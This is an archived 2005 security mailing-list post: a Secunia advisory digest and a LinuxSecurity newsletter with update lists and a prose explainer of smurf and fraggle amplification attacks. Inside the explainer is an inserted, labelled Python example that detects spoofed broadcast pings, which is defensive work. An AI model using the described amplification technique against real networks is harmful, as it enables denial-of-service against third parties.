Full Advisory:
http://secunia.com/advisories/16696/

--

[SA16675] Debian update for webcalendar

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2005-09-02

Debian has issued an update for webcalendar. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/16675/

--

[SA16670] Debian update for phpgroupware

Critical:    Highly critical
Where:       From remote
Impact:      Security Bypass, Cross Site Scripting, System access
Released:    2005-09-02

Debian has issued an update for phpgroupware. This fixes some vulnerabilities, which can be exploited by malicious administrative users to conduct script insertion attacks, or by malicious people to bypass certain security restrictions or compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/16670/

--

[SA16723] Mandriva update for mplayer

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2005-09-07

Mandriva has issued an update for mplayer. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/16723/

--

[SA16709] Fedora update for squid

Critical:    Moderately critical
Where:       From remote
Impact:      DoS
Released:    2005-09-07

Fedora has issued an update for squid. This fixes some vulnerabilities, which potentially can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/16709/

--

[SA16708] Squid "storeBuffer()" Denial of Service Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      DoS
Released:    2005-09-07

Nickolay has reported a vulnerability in Squid, which potentially can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/16708/

--

[SA16705] Red Hat update for httpd

Critical:    Moderately critical
Where:       From remote
Impact:      Security Bypass, DoS
Released:    2005-09-06

Red Hat has issued an update for httpd. This fixes a vulnerability and a security issue, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially bypass certain security restrictions.
Full Advisory:
http://secunia.com/advisories/16705/

--

[SA16704] SqWebMail Conditional Comments Script Insertion Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2005-09-06

Secunia Research has discovered a vulnerability in SqWebMail, which can be exploited by malicious people to conduct script insertion attacks.

Full Advisory:
http://secunia.com/advisories/16704/

--

[SA16700] mod_ssl "SSLVerifyClient" Security Bypass Security Issue

Critical:    Moderately critical
Where:       From remote
Impact:      Security Bypass
Released:    2005-09-05

A security issue has been reported in mod_ssl, which potentially can be exploited by malicious people to bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/16700/

--

[SA16694] Gentoo update for gnumeric

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2005-09-05

Gentoo has issued an update for gnumeric. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/16694/

--

[SA16690] Debian update for zsync

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2005-09-02

Debian has issued an update for zsync. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a user's system.

Full Advisory:
http://secunia.com/advisories/16690/

--

[SA16689] Debian update for affix

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2005-09-02

Debian has issued an update for affix. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/16689/

--

[SA16681] Debian update for proftpd

Critical:    Moderately critical
Where:       From remote
Impact:      Exposure of sensitive information, DoS, System access
Released:    2005-09-02

Debian has issued an update for proftpd. This fixes two vulnerabilities, which can be exploited by malicious users to disclose certain sensitive information, cause a DoS (Denial of Service), or potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/16681/

--

[SA16679] Debian update for pcre3

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2005-09-02

Debian has issued an update for pcre3. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/16679/

--

[SA16677] Trustix update for multiple packages

Critical:    Moderately critical
Where:       From remote
Impact:      Privilege escalation, DoS, System access
Released:    2005-09-02

Trustix has issued updates for multiple packages. These fix some vulnerabilities, which potentially can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges, and by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/16677/

--

[SA16674] Squid "sslConnectTimeout()" Denial of Service Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      DoS
Released:    2005-09-02

Alex Masterov has reported a vulnerability in Squid, which potentially can be exploited by malicious people to cause a DoS (Denial of Service).
Full Advisory:
http://secunia.com/advisories/16674/

--

[SA16672] zsync Multiple zlib Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2005-09-02

Some vulnerabilities have been reported in zsync, which can be exploited by malicious people to conduct a DoS (Denial of Service) or potentially compromise a user's system.

Full Advisory:
http://secunia.com/advisories/16672/

--

[SA16737] Avaya Intuity Audix cpio Directory Traversal Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      System access
Released:    2005-09-07

Avaya has acknowledged a vulnerability in Intuity Audix, which can be exploited by malicious people to cause files to be unpacked to arbitrary locations on a user's system.

Full Advisory:
http://secunia.com/advisories/16737/

--

[SA16702] Gentoo update for phpldapadmin

Critical:    Less critical
Where:       From remote
Impact:      Security Bypass
Released:    2005-09-06

Gentoo has issued an update for phpldapadmin. This fixes a security issue, which can be exploited by malicious people to bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/16702/

--

[SA16701] UnixWare ICMP Message Handling Denial of Service

Critical:    Less critical
Where:       From remote
Impact:      DoS
Released:    2005-09-05

SCO has issued an update for UnixWare. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) on an active TCP session.

Full Advisory:
http://secunia.com/advisories/16701/

--

[SA16686] OpenSSH Two Security Issues

Critical:    Less critical
Where:       From remote
Impact:      Security Bypass, Privilege escalation
Released:    2005-09-02

Two security issues have been reported in OpenSSH, which can be exploited by malicious users to gain escalated privileges or bypass certain security restrictions.
Full Advisory:
http://secunia.com/advisories/16686/

--

[SA16676] Trustix update for cups

Critical:    Less critical
Where:       From remote
Impact:      DoS
Released:    2005-09-02

Trustix has issued an update for cups. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) on a vulnerable system.

Full Advisory:
http://secunia.com/advisories/16676/

--

[SA16730] DCC dccifd Proxy Mode Denial of Service

Critical:    Less critical
Where:       From local network
Impact:      DoS
Released:    2005-09-07

Martin Pala has reported a vulnerability in DCC, which potentially can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/16730/

--

[SA16736] Mandriva update for smb4k

Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2005-09-07

Mandriva has issued an update for smb4k. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges.

Full Advisory:
http://secunia.com/advisories/16736/

--

[SA16724] Smb4k Insecure Temporary File Handling Vulnerability

Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2005-09-07

A vulnerability has been reported in Smb4K, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges.

Full Advisory:
http://secunia.com/advisories/16724/

--

[SA16720] Ubuntu update for kdebase-bin

Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2005-09-07

Ubuntu has issued an update for kdebase-bin. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges.
Full Advisory:
http://secunia.com/advisories/16720/

--

[SA16716] Mandriva update for kdeedu

Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2005-09-07

Mandriva has issued an update for kdeedu. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions with escalated privileges on a vulnerable system.

Full Advisory:
http://secunia.com/advisories/16716/

--

[SA16715] Mandriva update for kdebase

Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2005-09-07

Mandriva has issued an update for kdebase. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges.

Full Advisory:
http://secunia.com/advisories/16715/

--

[SA16703] Fedora update for perl-DBI

Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2005-09-06

Fedora has issued an update for perl-DBI. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges.

Full Advisory:
http://secunia.com/advisories/16703/

--

[SA16695] Gentoo update for net-snmp

Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2005-09-06

Gentoo has issued an update for net-snmp. This fixes a vulnerability, which can be exploited by malicious, local users to gain escalated privileges.

Full Advisory:
http://secunia.com/advisories/16695/

--

[SA16692] KDE kcheckpass Insecure Lock File Creation Vulnerability

Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2005-09-05

Ilja van Sprundel has reported a vulnerability in kcheckpass, which potentially can be exploited by malicious, local users to gain escalated privileges.
Full Advisory:
http://secunia.com/advisories/16692/

--

[SA16725] Debian update for cvs

Critical:    Not critical
Where:       Local system
Impact:      Privilege escalation
Released:    2005-09-07

Debian has issued an update for cvs. This fixes a security issue, which potentially can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges.

Full Advisory:
http://secunia.com/advisories/16725/

--

[SA16706] Red Hat update for cvs

Critical:    Not critical
Where:       Local system
Impact:      Privilege escalation
Released:    2005-09-06

Red Hat has issued an update for cvs. This fixes a security issue, which potentially can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges.

Full Advisory:
http://secunia.com/advisories/16706/

--

[SA16687] Debian update for ntp

Critical:    Not critical
Where:       Local system
Impact:      Privilege escalation
Released:    2005-09-05

Debian has issued an update for ntp. This fixes a security issue, which can cause ntpd to run with incorrect group permissions.

Full Advisory:
http://secunia.com/advisories/16687/

--

[SA16680] URBAN Symlink and Multiple Local Buffer Overflow Vulnerabilities

Critical:    Not critical
Where:       Local system
Impact:      Privilege escalation
Released:    2005-09-05

shaun has reported some vulnerabilities in URBAN, which can be exploited by malicious, local users to gain escalated privileges.

Full Advisory:
http://secunia.com/advisories/16680/

--

[SA16673] Debian update for polygen

Critical:    Not critical
Where:       Local system
Impact:      Manipulation of data
Released:    2005-09-02

Debian has issued an update for polygen. This fixes a weakness, which can be exploited by malicious, local users to manipulate the contents of certain files.
Full Advisory:
http://secunia.com/advisories/16673/

--

[SA16671] Polygen Output Files Insecure Permissions Weakness

Critical:    Not critical
Where:       Local system
Impact:      Manipulation of data
Released:    2005-09-02

Justin B Rye has reported a weakness in polygen, which can be exploited by malicious, local users to manipulate certain information.

Full Advisory:
http://secunia.com/advisories/16671/


Other:
--

[SA16683] Barracuda Spam Firewall Multiple Vulnerabilities

Critical:    Moderately critical
Where:       From local network
Impact:      Manipulation of data, Exposure of system information, Exposure of sensitive information, System access
Released:    2005-09-02

Francois Harvey has reported some vulnerabilities in Barracuda Spam Firewall, which can be exploited by malicious users to disclose and manipulate sensitive information and by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/16683/


Cross Platform:
--

[SA16707] GuppY Multiple Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      Cross Site Scripting, System access
Released:    2005-09-06

Romano_45 has reported some vulnerabilities in GuppY, which can be exploited by malicious people to conduct cross-site scripting and script insertion attacks, and compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/16707/

--

[SA16693] MAXdev MD-Pro Multiple Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      Unknown, System access
Released:    2005-09-05

Some vulnerabilities have been reported in MAXdev MD-Pro, where some have unknown impacts and others can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/16693/

--

[SA16682] WebGUI Perl Code Execution Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2005-09-02

Some vulnerabilities have been reported in WebGUI, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/16682/

--

[SA16733] Symantec Brightmail AntiSpam Denial of Service Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      DoS
Released:    2005-09-07

Two vulnerabilities have been reported in Brightmail, which potentially can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/16733/

--

[SA16731] MAXdev MD-Pro Cross-Site Scripting and File Upload Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting, Exposure of system information, System access
Released:    2005-09-07

rgod has discovered some vulnerabilities in MAXdev MD-Pro, which can be exploited by malicious people to conduct cross-site scripting and script insertion attacks and potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/16731/

--

[SA16726] Unclassified NewsBoard "Description" Script Insertion Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2005-09-07

rgod has discovered a vulnerability in Unclassified NewsBoard, which can be exploited by malicious people to conduct script insertion attacks.

Full Advisory:
http://secunia.com/advisories/16726/

--

[SA16721] phpCommunityCalendar Multiple Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      Security Bypass, Cross Site Scripting, Manipulation of data
Released:    2005-09-07

rgod has discovered some vulnerabilities in phpCommunityCalendar, which can be exploited by malicious people to conduct cross-site scripting, script insertion and SQL injection attacks.
Full Advisory:
http://secunia.com/advisories/16721/

--

[SA16710] Land Down Under "neventtext" Script Insertion Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2005-09-07

conor.e.buckley has discovered a vulnerability in Land Down Under, which can be exploited by malicious people to conduct script insertion attacks.

Full Advisory:
http://secunia.com/advisories/16710/

--

[SA16699] myBloggie "username" SQL Injection Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Security Bypass, Manipulation of data
Released:    2005-09-05

OS2A has reported a vulnerability in myBloggie, which can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/16699/

--

[SA16669] Nikto "Server" Header Script Insertion Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2005-09-02

Mariano Nunez Di Croce has reported a vulnerability in Nikto, which can be exploited by malicious people to conduct script insertion attacks.

Full Advisory:
http://secunia.com/advisories/16669/

--

[SA16667] Phorum "Username" Script Insertion Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2005-09-02

Scott Dewey has reported a vulnerability in Phorum, which can be exploited by malicious people to conduct script insertion attacks.

Full Advisory:
http://secunia.com/advisories/16667/

--

[SA16734] Open WebMail "sessionid" Cross-Site Scripting Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2005-09-07

s3cure has reported a vulnerability in Open WebMail, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/16734/

--

[SA16668] gBook Unspecified Cross-Site Scripting Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2005-09-02

Some vulnerabilities have been reported in gBook, which can be exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/16668/

--

[SA16688] Apache PCRE Integer Overflow Vulnerability

Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2005-09-05

A vulnerability has been reported in Apache, which can be exploited by malicious, local users to gain escalated privileges via a specially crafted ".htaccess" file.

Full Advisory:
http://secunia.com/advisories/16688/


========================================================================

Secunia recommends that you verify all advisories you receive, by clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only use those supplied by the vendor.

Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/

Subscribe:
http://secunia.com/secunia_weekly_summary/

Contact details:
Web     : http://secunia.com/
E-mail  : support@secunia.com
Tel     : +45 70 20 51 44
Fax     : +45 70 20 51 45


From isn at c4i.org Sat Sep 10 00:29:21 2005
From: isn at c4i.org (InfoSec News)
Date: Sat Sep 10 00:38:53 2005
Subject: [ISN] Linux Advisory Watch - September 9th 2005
Message-ID:

+---------------------------------------------------------------------+
|  LinuxSecurity.com                          Weekly Newsletter       |
|  September 9th, 2005                        Volume 6, Number 37a    |
+---------------------------------------------------------------------+

Editors:          Dave Wreski                Benjamin D. Thomas
                  dave@linuxsecurity.com     ben@linuxsecurity.com

Linux Advisory Watch is a comprehensive newsletter that outlines the security vulnerabilities that have been announced throughout the week.
It includes pointers to updated packages and descriptions of each vulnerability.

This week, advisories were released for proftpd, sqwebmail, polygen, affix, zsync, phpgroupware, webcalendar, pcre3, ntp, cvs, kdelibs, evince, openmotif, cman, gnbd-kernel, dlm-kernel, lockdev, perl, termcap, ckermit, kdegraphics, squid, pam, setup, tar, openssh, tzdata, httpd, mplayer, and phpldapadmin. The distributors include Debian, Fedora, Gentoo, and Red Hat.

---

## Master of Science in Information Security ##

Earn your Master of Science in Information Security online from Norwich University. Designated a "Center of Excellence", the program offers a solid education in the management of information assurance, and the unique case study method melds theory into practice. Using today's e-Learning technology, you can earn this esteemed degree, without disrupting your career or home life.

LEARN MORE:
http://www.msia.norwich.edu/linux_en

---

Introduction: IP Spoofing, Part III ICMP Smurfing
By: Suhas A Desai

"Smurf" is the name of an automated program that attacks a network by exploiting IP broadcast addressing. Smurf and similar programs can cause the attacked part of a network to become "inoperable." Network nodes and their administrators use ICMP to exchange information about the state of the network.

A smurf program builds a network packet with a spoofed victim source address. The packet contains an ICMP ping message addressed to an IP broadcast address, meaning all IP addresses in a given network. If the routing device delivering traffic to those broadcast addresses performs the IP broadcast to layer 2 broadcast function, most hosts on that IP network will each reply to it with an ICMP echo reply. The echo responses to the ping message are sent back to the victim address. Enough pings and resultant echoes can flood the network, making it unusable for real traffic.
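The spoofed-source broadcast ping just described is exactly what edge filtering and directed-broadcast blocking are meant to catch. The following is an added example, not code from the article or from LinuxSecurity.com: an offline checker that applies both rules to constructed packet records from the point of view of one network, assumed here to be the documentation prefix 192.0.2.0/24, and that flags the amplification signature (one outside address answered by many local hosts at once).

```python
"""Added example (not from the article): edge-filter decisions and a smurf
amplification detector over constructed packet records."""
from collections import defaultdict
from dataclasses import dataclass
import ipaddress

# Assumed: the network whose edge we are filtering (a documentation prefix).
LOCAL_NET = ipaddress.ip_network("192.0.2.0/24")


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    kind: str       # "echo-request" / "echo-reply" (ICMP) or "udp-echo" (fraggle)
    direction: str  # "in" = arriving from upstream, "out" = leaving towards upstream


def is_broadcast(dst: str) -> bool:
    """True for our prefix's directed-broadcast address or the limited broadcast."""
    return ipaddress.ip_address(dst) == LOCAL_NET.broadcast_address or dst == "255.255.255.255"


def classify(pkt: Packet) -> str:
    """Decide what an edge filter should do with one packet."""
    src = ipaddress.ip_address(pkt.src)
    # Anti-spoofing at the edge: a packet leaving us must carry one of our own
    # addresses, and a packet arriving from upstream must not claim one.
    if pkt.direction == "out" and src not in LOCAL_NET:
        return "drop:egress-spoof"
    if pkt.direction == "in" and src in LOCAL_NET:
        return "drop:ingress-spoof"
    # The amplification trigger: an echo request aimed at a broadcast address.
    if pkt.kind in ("echo-request", "udp-echo") and is_broadcast(pkt.dst):
        return "drop:broadcast-echo"
    return "forward"


def amplification_victims(packets, min_sources: int = 3) -> dict:
    """Map each outside address that receives echo replies from at least
    min_sources distinct local hosts to that count; many of our hosts
    answering one external address together is the smurf signature."""
    sources = defaultdict(set)
    for p in packets:
        if p.kind == "echo-reply" and p.direction == "out":
            sources[p.dst].add(p.src)
    return {dst: len(s) for dst, s in sources.items() if len(s) >= min_sources}


def audit(packets):
    """Return (filter decision per packet, suspected amplification victims)."""
    return [classify(p) for p in packets], amplification_victims(packets)


# Constructed sample traffic (not captured data); 203.0.113.5 plays the victim.
SAMPLE = [
    Packet("192.0.2.10", "198.51.100.7", "echo-request", "out"),     # ordinary ping
    Packet("203.0.113.5", "198.51.100.255", "echo-request", "out"),  # spoofed trigger leaving us
    Packet("203.0.113.5", "192.0.2.255", "echo-request", "in"),      # trigger aimed at our broadcast
    Packet("192.0.2.10", "192.0.2.20", "echo-request", "in"),        # our own address from upstream
] + [Packet(f"192.0.2.{i}", "203.0.113.5", "echo-reply", "out") for i in (11, 12, 13, 14)]


if __name__ == "__main__":
    decisions, victims = audit(SAMPLE)
    for p, d in zip(SAMPLE, decisions):
        print(f"{p.direction:>3} {p.src:>13} -> {p.dst:<15} {p.kind:<12} {d}")
    print("amplification victims:", victims)
```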
A related attack is called "fraggle", a simple rewrite of smurf that uses UDP echo packets in the same fashion as the ICMP echo packets. The intermediary (broadcast) devices and the spoofed victim are both hurt by this attack.

The attackers rely on the ability to source spoofed packets to the "amplifiers" in order to generate the traffic which causes the denial of service. To stop this, all networks should perform filtering either at the edge of the network where customers connect (access layer) or at the edge of the network with connections to the upstream providers, so that source-address-spoofed packets can neither enter from downstream networks nor leave for upstream networks.

One way to defeat smurfing is to disable IP broadcast addressing at each network router, since it is seldom used.

READ ENTIRE ARTICLE:
http://www.linuxsecurity.com/content/view/120225/49/

----------------------

Linux File & Directory Permissions Mistakes

One common mistake Linux administrators make is having file and directory permissions that are far too liberal and allow access beyond that which is needed for proper system operations. A full explanation of unix file permissions is beyond the scope of this article, so I'll assume you are familiar with the usage of such tools as chmod, chown, and chgrp. If you'd like a refresher, one is available right here on linuxsecurity.com.

http://www.linuxsecurity.com/content/view/119415/49/

---

Buffer Overflow Basics

A buffer overflow occurs when a program or process tries to store more data in a temporary data storage area than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information can overflow into adjacent buffers, corrupting or overwriting the valid data held in them.
http://www.linuxsecurity.com/content/view/119087/49/

---

Review: The Book of Postfix: State-of-the-Art Message Transport

I was very impressed with "The Book of Postfix" by authors Ralf Hildebrandt and Patrick Koetter and feel that it is an incredible Postfix reference. It gives a great overall view of the operation and management of Postfix in an extremely systematic and practical format. It flows in a logical manner, is easy to follow and the authors did a great job of explaining topics with attention paid to real world applications and how to avoid many of the associated pitfalls. I am happy to have this reference in my collection.

http://www.linuxsecurity.com/content/view/119027/49/

--------

--> Take advantage of the LinuxSecurity.com Quick Reference Card!
--> http://www.linuxsecurity.com/docs/QuickRefCard.pdf


+---------------------------------+
|  Distribution: Debian           | ----------------------------//
+---------------------------------+

* Debian: New proftpd packages fix format string vulnerability
  1st, September, 2005

  Updated package.
  http://www.linuxsecurity.com/content/view/120281

* Debian: New sqwebmail packages fix cross-site scripting
  1st, September, 2005

  Updated package.
  http://www.linuxsecurity.com/content/view/120273

* Debian: New Mozilla Firefox packages fix several vulnerabilities
  1st, September, 2005

  Update Package.
  http://www.linuxsecurity.com/content/view/120278

* Debian: New polygen packages fix denial of service
  1st, September, 2005

  Updated package.
  http://www.linuxsecurity.com/content/view/120280

* Debian: New affix packages fix remote command execution
  1st, September, 2005

  Updated package.
  http://www.linuxsecurity.com/content/view/120282

* Debian: New zsync packages fix DOS
  1st, September, 2005

  Updated package.
  http://www.linuxsecurity.com/content/view/120283

* Debian: New phpgroupware packages fix several vulnerabilities
  2nd, September, 2005

  Updated package.
  http://www.linuxsecurity.com/content/view/120285

* Debian: New webcalendar packages fix remote code execution
  2nd, September, 2005

  Updated package.
  http://www.linuxsecurity.com/content/view/120287

* Debian: New pcre3 packages fix arbitrary code execution
  2nd, September, 2005

  Updated package.
  http://www.linuxsecurity.com/content/view/120288

* Debian: Updated i386 proftpd packages fix format string vulnerability
  2nd, September, 2005

  Updated package.
  http://www.linuxsecurity.com/content/view/120294

* Debian: New ntp packages fix group id confusion
  5th, September, 2005

  Updated package.
  http://www.linuxsecurity.com/content/view/120298

* Debian: New cvs packages fix insecure temporary files
  7th, September, 2005

  Updated package.
  http://www.linuxsecurity.com/content/view/120319

* Debian: New Apache packages fix HTTP request smuggling
  8th, September, 2005

  Updated package.
  http://www.linuxsecurity.com/content/view/120330

* Debian: New kdelibs packages fix backup file information leak
  8th, September, 2005

  Updated package.
  http://www.linuxsecurity.com/content/view/120332


+---------------------------------+
|  Distribution: Fedora           | ----------------------------//
+---------------------------------+

* Fedora Core 4 Update: evince-0.4.0-1.2
  1st, September, 2005

  Updated package.
  http://www.linuxsecurity.com/content/view/120279

* Fedora Core 4 Update: openmotif-2.2.3-10.FC4.1
  2nd, September, 2005

  Updated package.
  http://www.linuxsecurity.com/content/view/120289

* Fedora Core 4 Update: cman-kernel-2.6.11.5-20050601.152643.FC4.12
  2nd, September, 2005

  Rebuild for latest kernel, 2.6.12-1.1447_FC4.
  http://www.linuxsecurity.com/content/view/120290

* Fedora Core 4 Update: gnbd-kernel-2.6.11.2-20050420.133124.FC4.45
  2nd, September, 2005

  Rebuild for latest kernel, 2.6.12-1.1447_FC4.
  http://www.linuxsecurity.com/content/view/120291

* Fedora Core 4 Update: dlm-kernel-2.6.11.5-20050601.152643.FC4.12
  2nd, September, 2005

  Rebuild for latest kernel, 2.6.12-1.1447_FC4.
  http://www.linuxsecurity.com/content/view/120292

* Fedora Core 4 Update: GFS-kernel-2.6.11.8-20050601.152643.FC4.14
  2nd, September, 2005

  Rebuild for latest kernel, 2.6.12-1.1447_FC4.
  http://www.linuxsecurity.com/content/view/120293

* Fedora Core 4 Update: lockdev-1.0.1-7.1
  2nd, September, 2005

  Updated package.
  http://www.linuxsecurity.com/content/view/120295

* Fedora Core 3 Update: perl-Compress-Zlib-1.37-1.fc3
  6th, September, 2005

  Some bug fixes so the amavis users stop complaining. =)
  http://www.linuxsecurity.com/content/view/120303

* Fedora Core 4 Update: perl-Compress-Zlib-1.37-1.fc4
  6th, September, 2005

  Some bug fixes so the amavis users stop complaining. =)
  http://www.linuxsecurity.com/content/view/120304

* Fedora Core 3 Update: perl-DBI-1.40-6.fc3
  6th, September, 2005

  Old and low priority security update that we forgot to push a while ago.
  http://www.linuxsecurity.com/content/view/120305

* Fedora Core 4 Update: termcap-5.4-6
  6th, September, 2005

  Updated package.
  http://www.linuxsecurity.com/content/view/120306

* Fedora Core 4 Update: ckermit-8.0.211-3.FC4
  6th, September, 2005

  Updated package.
  http://www.linuxsecurity.com/content/view/120307

* Fedora Core 4 Update: kdegraphics-3.4.2-0.fc4.2
  6th, September, 2005

  Updated package.
  http://www.linuxsecurity.com/content/view/120308

* Fedora Core 4 Update: squid-2.5.STABLE9-8
  6th, September, 2005

  Updated package.
  http://www.linuxsecurity.com/content/view/120315

* Fedora Core 3 Update: squid-2.5.STABLE9-1.FC3.7
  6th, September, 2005

  Updated package.
  http://www.linuxsecurity.com/content/view/120316

* Fedora Core 4 Update: pam-0.79-9.5
  6th, September, 2005

  This update should fix potential problems with auditing in pam when used on systems with kernels without audit compiled in.
  http://www.linuxsecurity.com/content/view/120317

* Fedora Core 4 Update: setup-2.5.44-1.1
  6th, September, 2005

  Updated package.
  http://www.linuxsecurity.com/content/view/120318

* Fedora Core 4 Update: tar-1.15.1-10.FC4
  7th, September, 2005
  Updated package.
  http://www.linuxsecurity.com/content/view/120323

* Fedora Core 3 Update: openssh-3.9p1-8.0.3
  7th, September, 2005
  This security update fixes CAN-2005-2798 and resolves a problem with X
  forwarding binding only on IPv6 address on certain circumstances.
  http://www.linuxsecurity.com/content/view/120324

* Fedora Core 4 Update: tzdata-2005m-1.fc4
  7th, September, 2005
  Updated package.
  http://www.linuxsecurity.com/content/view/120325

* Fedora Core 3 Update: tzdata-2005m-1.fc3
  7th, September, 2005
  Updated package.
  http://www.linuxsecurity.com/content/view/120326

* Fedora Core 4 Update: httpd-2.0.54-10.2
  7th, September, 2005
  This update includes two security fixes. An issue was discovered in
  mod_ssl where "SSLVerifyClient require" would not be honoured in
  location context if the virtual host had "SSLVerifyClient optional"
  configured (CAN-2005-2700).
  http://www.linuxsecurity.com/content/view/120327

* Fedora Core 3 Update: httpd-2.0.53-3.3
  7th, September, 2005
  This update includes two security fixes. An issue was discovered in
  mod_ssl where "SSLVerifyClient require" would not be honoured in
  location context if the virtual host had "SSLVerifyClient optional"
  configured (CAN-2005-2700).
  http://www.linuxsecurity.com/content/view/120328

+---------------------------------+
|  Distribution: Gentoo           | ----------------------------//
+---------------------------------+

* Gentoo: MPlayer Heap overflow in ad_pcm.c
  1st, September, 2005
  A heap overflow in MPlayer might lead to the execution of arbitrary code.
  http://www.linuxsecurity.com/content/view/120276

* Gentoo: Gnumeric Heap overflow in the included PCRE library
  3rd, September, 2005
  Gnumeric is vulnerable to a heap overflow, possibly leading to the
  execution of arbitrary code.
  http://www.linuxsecurity.com/content/view/120296

* Gentoo: OpenTTD Format string vulnerabilities
  5th, September, 2005
  OpenTTD is vulnerable to format string vulnerabilities which may result
  in remote execution of arbitrary code.
  http://www.linuxsecurity.com/content/view/120301

* Gentoo: phpLDAPadmin Authentication bypass
  6th, September, 2005
  A flaw in phpLDAPadmin may allow attackers to bypass security
  restrictions and connect anonymously.
  http://www.linuxsecurity.com/content/view/120311

* Gentoo: Net-SNMP Insecure RPATH
  6th, September, 2005
  The Gentoo Net-SNMP package may provide Perl modules containing an
  insecure DT_RPATH, potentially allowing privilege escalation.
  http://www.linuxsecurity.com/content/view/120312

* Gentoo: Squid Denial of Service vulnerabilities
  7th, September, 2005
  Squid contains several bugs when handling certain malformed requests
  resulting in a Denial of Service.
  http://www.linuxsecurity.com/content/view/120322

+---------------------------------+
|  Distribution: Red Hat          | ----------------------------//
+---------------------------------+

* RedHat: Important: httpd security update
  6th, September, 2005
  Updated Apache httpd packages that correct two security issues are now
  available for Red Hat Enterprise Linux 3 and 4. This update has been
  rated as having important security impact by the Red Hat Security
  Response Team.
  http://www.linuxsecurity.com/content/view/120313

* RedHat: Low: cvs security update
  6th, September, 2005
  An updated cvs package that fixes a security bug is now available. This
  update has been rated as having low security impact by the Red Hat
  Security Response Team.
  http://www.linuxsecurity.com/content/view/120314

------------------------------------------------------------------------
